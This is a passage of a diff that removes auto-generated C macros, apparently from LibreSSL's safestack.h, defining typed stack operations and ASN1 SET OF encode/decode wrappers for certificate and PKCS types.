-#define sk_void_is_sorted(st) SKM_sk_is_sorted(void, (st))
-
-#define sk_OPENSSL_STRING_new(cmp) ((STACK_OF(OPENSSL_STRING) *)sk_new(CHECKED_SK_CMP_FUNC(char, cmp)))
-#define sk_OPENSSL_STRING_new_null() ((STACK_OF(OPENSSL_STRING) *)sk_new_null())
-#define sk_OPENSSL_STRING_push(st, val) sk_push(CHECKED_STACK_OF(OPENSSL_STRING, st), CHECKED_PTR_OF(char, val))
-#define sk_OPENSSL_STRING_find(st, val) sk_find(CHECKED_STACK_OF(OPENSSL_STRING, st), CHECKED_PTR_OF(char, val))
-#define sk_OPENSSL_STRING_value(st, i) ((OPENSSL_STRING)sk_value(CHECKED_STACK_OF(OPENSSL_STRING, st), i))
-#define sk_OPENSSL_STRING_num(st) SKM_sk_num(OPENSSL_STRING, st)
-#define sk_OPENSSL_STRING_pop_free(st, free_func) sk_pop_free(CHECKED_STACK_OF(OPENSSL_STRING, st), CHECKED_SK_FREE_FUNC2(OPENSSL_STRING, free_func))
-#define sk_OPENSSL_STRING_insert(st, val, i) sk_insert(CHECKED_STACK_OF(OPENSSL_STRING, st), CHECKED_PTR_OF(char, val), i)
-#define sk_OPENSSL_STRING_free(st) SKM_sk_free(OPENSSL_STRING, st)
-#define sk_OPENSSL_STRING_set(st, i, val) sk_set(CHECKED_STACK_OF(OPENSSL_STRING, st), i, CHECKED_PTR_OF(char, val))
-#define sk_OPENSSL_STRING_zero(st) SKM_sk_zero(OPENSSL_STRING, (st))
-#define sk_OPENSSL_STRING_unshift(st, val) sk_unshift(CHECKED_STACK_OF(OPENSSL_STRING, st), CHECKED_PTR_OF(char, val))
-#define sk_OPENSSL_STRING_find_ex(st, val) sk_find_ex((_STACK *)CHECKED_CONST_PTR_OF(STACK_OF(OPENSSL_STRING), st), CHECKED_CONST_PTR_OF(char, val))
-#define sk_OPENSSL_STRING_delete(st, i) SKM_sk_delete(OPENSSL_STRING, (st), (i))
-#define sk_OPENSSL_STRING_delete_ptr(st, ptr) (OPENSSL_STRING *)sk_delete_ptr(CHECKED_STACK_OF(OPENSSL_STRING, st), CHECKED_PTR_OF(char, ptr))
-#define sk_OPENSSL_STRING_set_cmp_func(st, cmp)  \
-	((int (*)(const char * const *,const char * const *)) \
-	sk_set_cmp_func(CHECKED_STACK_OF(OPENSSL_STRING, st), CHECKED_SK_CMP_FUNC(char, cmp)))
-#define sk_OPENSSL_STRING_dup(st) SKM_sk_dup(OPENSSL_STRING, st)
-#define sk_OPENSSL_STRING_shift(st) SKM_sk_shift(OPENSSL_STRING, (st))
-#define sk_OPENSSL_STRING_pop(st) (char *)sk_pop(CHECKED_STACK_OF(OPENSSL_STRING, st))
-#define sk_OPENSSL_STRING_sort(st) SKM_sk_sort(OPENSSL_STRING, (st))
-#define sk_OPENSSL_STRING_is_sorted(st) SKM_sk_is_sorted(OPENSSL_STRING, (st))
-
-
-#define sk_OPENSSL_BLOCK_new(cmp) ((STACK_OF(OPENSSL_BLOCK) *)sk_new(CHECKED_SK_CMP_FUNC(void, cmp)))
-#define sk_OPENSSL_BLOCK_new_null() ((STACK_OF(OPENSSL_BLOCK) *)sk_new_null())
-#define sk_OPENSSL_BLOCK_push(st, val) sk_push(CHECKED_STACK_OF(OPENSSL_BLOCK, st), CHECKED_PTR_OF(void, val))
-#define sk_OPENSSL_BLOCK_find(st, val) sk_find(CHECKED_STACK_OF(OPENSSL_BLOCK, st), CHECKED_PTR_OF(void, val))
-#define sk_OPENSSL_BLOCK_value(st, i) ((OPENSSL_BLOCK)sk_value(CHECKED_STACK_OF(OPENSSL_BLOCK, st), i))
-#define sk_OPENSSL_BLOCK_num(st) SKM_sk_num(OPENSSL_BLOCK, st)
-#define sk_OPENSSL_BLOCK_pop_free(st, free_func) sk_pop_free(CHECKED_STACK_OF(OPENSSL_BLOCK, st), CHECKED_SK_FREE_FUNC2(OPENSSL_BLOCK, free_func))
-#define sk_OPENSSL_BLOCK_insert(st, val, i) sk_insert(CHECKED_STACK_OF(OPENSSL_BLOCK, st), CHECKED_PTR_OF(void, val), i)
-#define sk_OPENSSL_BLOCK_free(st) SKM_sk_free(OPENSSL_BLOCK, st)
-#define sk_OPENSSL_BLOCK_set(st, i, val) sk_set(CHECKED_STACK_OF(OPENSSL_BLOCK, st), i, CHECKED_PTR_OF(void, val))
-#define sk_OPENSSL_BLOCK_zero(st) SKM_sk_zero(OPENSSL_BLOCK, (st))
-#define sk_OPENSSL_BLOCK_unshift(st, val) sk_unshift(CHECKED_STACK_OF(OPENSSL_BLOCK, st), CHECKED_PTR_OF(void, val))
-#define sk_OPENSSL_BLOCK_find_ex(st, val) sk_find_ex((_STACK *)CHECKED_CONST_PTR_OF(STACK_OF(OPENSSL_BLOCK), st), CHECKED_CONST_PTR_OF(void, val))
-#define sk_OPENSSL_BLOCK_delete(st, i) SKM_sk_delete(OPENSSL_BLOCK, (st), (i))
-#define sk_OPENSSL_BLOCK_delete_ptr(st, ptr) (OPENSSL_BLOCK *)sk_delete_ptr(CHECKED_STACK_OF(OPENSSL_BLOCK, st), CHECKED_PTR_OF(void, ptr))
-#define sk_OPENSSL_BLOCK_set_cmp_func(st, cmp)  \
-	((int (*)(const void * const *,const void * const *)) \
-	sk_set_cmp_func(CHECKED_STACK_OF(OPENSSL_BLOCK, st), CHECKED_SK_CMP_FUNC(void, cmp)))
-#define sk_OPENSSL_BLOCK_dup(st) SKM_sk_dup(OPENSSL_BLOCK, st)
-#define sk_OPENSSL_BLOCK_shift(st) SKM_sk_shift(OPENSSL_BLOCK, (st))
-#define sk_OPENSSL_BLOCK_pop(st) (void *)sk_pop(CHECKED_STACK_OF(OPENSSL_BLOCK, st))
-#define sk_OPENSSL_BLOCK_sort(st) SKM_sk_sort(OPENSSL_BLOCK, (st))
-#define sk_OPENSSL_BLOCK_is_sorted(st) SKM_sk_is_sorted(OPENSSL_BLOCK, (st))
-
-
-#define sk_OPENSSL_PSTRING_new(cmp) ((STACK_OF(OPENSSL_PSTRING) *)sk_new(CHECKED_SK_CMP_FUNC(OPENSSL_STRING, cmp)))
-#define sk_OPENSSL_PSTRING_new_null() ((STACK_OF(OPENSSL_PSTRING) *)sk_new_null())
-#define sk_OPENSSL_PSTRING_push(st, val) sk_push(CHECKED_STACK_OF(OPENSSL_PSTRING, st), CHECKED_PTR_OF(OPENSSL_STRING, val))
-#define sk_OPENSSL_PSTRING_find(st, val) sk_find(CHECKED_STACK_OF(OPENSSL_PSTRING, st), CHECKED_PTR_OF(OPENSSL_STRING, val))
-#define sk_OPENSSL_PSTRING_value(st, i) ((OPENSSL_PSTRING)sk_value(CHECKED_STACK_OF(OPENSSL_PSTRING, st), i))
-#define sk_OPENSSL_PSTRING_num(st) SKM_sk_num(OPENSSL_PSTRING, st)
-#define sk_OPENSSL_PSTRING_pop_free(st, free_func) sk_pop_free(CHECKED_STACK_OF(OPENSSL_PSTRING, st), CHECKED_SK_FREE_FUNC2(OPENSSL_PSTRING, free_func))
-#define sk_OPENSSL_PSTRING_insert(st, val, i) sk_insert(CHECKED_STACK_OF(OPENSSL_PSTRING, st), CHECKED_PTR_OF(OPENSSL_STRING, val), i)
-#define sk_OPENSSL_PSTRING_free(st) SKM_sk_free(OPENSSL_PSTRING, st)
-#define sk_OPENSSL_PSTRING_set(st, i, val) sk_set(CHECKED_STACK_OF(OPENSSL_PSTRING, st), i, CHECKED_PTR_OF(OPENSSL_STRING, val))
-#define sk_OPENSSL_PSTRING_zero(st) SKM_sk_zero(OPENSSL_PSTRING, (st))
-#define sk_OPENSSL_PSTRING_unshift(st, val) sk_unshift(CHECKED_STACK_OF(OPENSSL_PSTRING, st), CHECKED_PTR_OF(OPENSSL_STRING, val))
-#define sk_OPENSSL_PSTRING_find_ex(st, val) sk_find_ex((_STACK *)CHECKED_CONST_PTR_OF(STACK_OF(OPENSSL_PSTRING), st), CHECKED_CONST_PTR_OF(OPENSSL_STRING, val))
-#define sk_OPENSSL_PSTRING_delete(st, i) SKM_sk_delete(OPENSSL_PSTRING, (st), (i))
-#define sk_OPENSSL_PSTRING_delete_ptr(st, ptr) (OPENSSL_PSTRING *)sk_delete_ptr(CHECKED_STACK_OF(OPENSSL_PSTRING, st), CHECKED_PTR_OF(OPENSSL_STRING, ptr))
-#define sk_OPENSSL_PSTRING_set_cmp_func(st, cmp)  \
-	((int (*)(const OPENSSL_STRING * const *,const OPENSSL_STRING * const *)) \
-	sk_set_cmp_func(CHECKED_STACK_OF(OPENSSL_PSTRING, st), CHECKED_SK_CMP_FUNC(OPENSSL_STRING, cmp)))
-#define sk_OPENSSL_PSTRING_dup(st) SKM_sk_dup(OPENSSL_PSTRING, st)
-#define sk_OPENSSL_PSTRING_shift(st) SKM_sk_shift(OPENSSL_PSTRING, (st))
-#define sk_OPENSSL_PSTRING_pop(st) (OPENSSL_STRING *)sk_pop(CHECKED_STACK_OF(OPENSSL_PSTRING, st))
-#define sk_OPENSSL_PSTRING_sort(st) SKM_sk_sort(OPENSSL_PSTRING, (st))
-#define sk_OPENSSL_PSTRING_is_sorted(st) SKM_sk_is_sorted(OPENSSL_PSTRING, (st))
-
-#ifndef LIBRESSL_INTERNAL
-#define d2i_ASN1_SET_OF_ACCESS_DESCRIPTION(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(ACCESS_DESCRIPTION, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_ACCESS_DESCRIPTION(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(ACCESS_DESCRIPTION, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_ACCESS_DESCRIPTION(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(ACCESS_DESCRIPTION, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_ACCESS_DESCRIPTION(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(ACCESS_DESCRIPTION, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_ASN1_INTEGER(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(ASN1_INTEGER, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_ASN1_INTEGER(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(ASN1_INTEGER, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_ASN1_INTEGER(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(ASN1_INTEGER, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_ASN1_INTEGER(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(ASN1_INTEGER, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_ASN1_OBJECT(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(ASN1_OBJECT, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_ASN1_OBJECT(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(ASN1_OBJECT, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_ASN1_OBJECT(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(ASN1_OBJECT, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_ASN1_OBJECT(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(ASN1_OBJECT, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_ASN1_TYPE(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(ASN1_TYPE, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_ASN1_TYPE(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(ASN1_TYPE, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_ASN1_TYPE(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(ASN1_TYPE, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_ASN1_TYPE(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(ASN1_TYPE, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_ASN1_UTF8STRING(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(ASN1_UTF8STRING, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_ASN1_UTF8STRING(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(ASN1_UTF8STRING, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_ASN1_UTF8STRING(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(ASN1_UTF8STRING, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_ASN1_UTF8STRING(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(ASN1_UTF8STRING, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_DIST_POINT(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(DIST_POINT, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_DIST_POINT(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(DIST_POINT, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_DIST_POINT(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(DIST_POINT, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_DIST_POINT(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(DIST_POINT, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_ESS_CERT_ID(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(ESS_CERT_ID, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_ESS_CERT_ID(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(ESS_CERT_ID, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_ESS_CERT_ID(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(ESS_CERT_ID, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_ESS_CERT_ID(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(ESS_CERT_ID, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_EVP_MD(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(EVP_MD, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_EVP_MD(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(EVP_MD, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_EVP_MD(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(EVP_MD, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_EVP_MD(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(EVP_MD, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_GENERAL_NAME(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(GENERAL_NAME, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_GENERAL_NAME(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(GENERAL_NAME, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_GENERAL_NAME(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(GENERAL_NAME, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_GENERAL_NAME(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(GENERAL_NAME, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_OCSP_ONEREQ(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(OCSP_ONEREQ, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_OCSP_ONEREQ(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(OCSP_ONEREQ, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_OCSP_ONEREQ(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(OCSP_ONEREQ, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_OCSP_ONEREQ(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(OCSP_ONEREQ, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_OCSP_SINGLERESP(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(OCSP_SINGLERESP, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_OCSP_SINGLERESP(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(OCSP_SINGLERESP, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_OCSP_SINGLERESP(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(OCSP_SINGLERESP, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_OCSP_SINGLERESP(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(OCSP_SINGLERESP, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_PKCS12_SAFEBAG(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(PKCS12_SAFEBAG, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_PKCS12_SAFEBAG(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(PKCS12_SAFEBAG, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_PKCS12_SAFEBAG(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(PKCS12_SAFEBAG, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_PKCS12_SAFEBAG(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(PKCS12_SAFEBAG, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_PKCS7(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(PKCS7, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_PKCS7(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(PKCS7, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_PKCS7(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(PKCS7, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_PKCS7(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(PKCS7, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_PKCS7_RECIP_INFO(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(PKCS7_RECIP_INFO, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_PKCS7_RECIP_INFO(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(PKCS7_RECIP_INFO, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_PKCS7_RECIP_INFO(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(PKCS7_RECIP_INFO, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_PKCS7_RECIP_INFO(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(PKCS7_RECIP_INFO, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_PKCS7_SIGNER_INFO(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(PKCS7_SIGNER_INFO, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_PKCS7_SIGNER_INFO(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(PKCS7_SIGNER_INFO, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_PKCS7_SIGNER_INFO(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(PKCS7_SIGNER_INFO, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_PKCS7_SIGNER_INFO(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(PKCS7_SIGNER_INFO, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_POLICYINFO(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(POLICYINFO, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_POLICYINFO(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(POLICYINFO, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_POLICYINFO(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(POLICYINFO, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_POLICYINFO(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(POLICYINFO, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_POLICYQUALINFO(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(POLICYQUALINFO, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_POLICYQUALINFO(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(POLICYQUALINFO, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_POLICYQUALINFO(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(POLICYQUALINFO, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_POLICYQUALINFO(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(POLICYQUALINFO, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_SXNETID(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(SXNETID, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_SXNETID(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(SXNETID, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_SXNETID(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(SXNETID, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_SXNETID(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(SXNETID, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_X509(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(X509, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_X509(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(X509, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_X509(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(X509, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_X509(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(X509, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_X509_ALGOR(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(X509_ALGOR, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_X509_ALGOR(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(X509_ALGOR, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_X509_ALGOR(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(X509_ALGOR, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_X509_ALGOR(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(X509_ALGOR, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_X509_ATTRIBUTE(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(X509_ATTRIBUTE, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_X509_ATTRIBUTE(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(X509_ATTRIBUTE, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_X509_ATTRIBUTE(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(X509_ATTRIBUTE, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_X509_ATTRIBUTE(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(X509_ATTRIBUTE, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_X509_CRL(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(X509_CRL, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_X509_CRL(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(X509_CRL, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_X509_CRL(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(X509_CRL, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_X509_CRL(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(X509_CRL, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_X509_EXTENSION(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(X509_EXTENSION, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_X509_EXTENSION(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(X509_EXTENSION, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_X509_EXTENSION(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(X509_EXTENSION, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_X509_EXTENSION(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(X509_EXTENSION, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_X509_NAME_ENTRY(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-	SKM_ASN1_SET_OF_d2i(X509_NAME_ENTRY, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
-#define i2d_ASN1_SET_OF_X509_NAME_ENTRY(st, pp, i2d_func, ex_tag, ex_class, is_set) \
-	SKM_ASN1_SET_OF_i2d(X509_NAME_ENTRY, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
-#define ASN1_seq_pack_X509_NAME_ENTRY(st, i2d_func, buf, len) \
-	SKM_ASN1_seq_pack(X509_NAME_ENTRY, (st), (i2d_func), (buf), (len))
-#define ASN1_seq_unpack_X509_NAME_ENTRY(buf, len, d2i_func, free_func) \
-	SKM_ASN1_seq_unpack(X509_NAME_ENTRY, (buf), (len), (d2i_func), (free_func))
-
-#define d2i_ASN1_SET_OF_X509_REVOKED(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
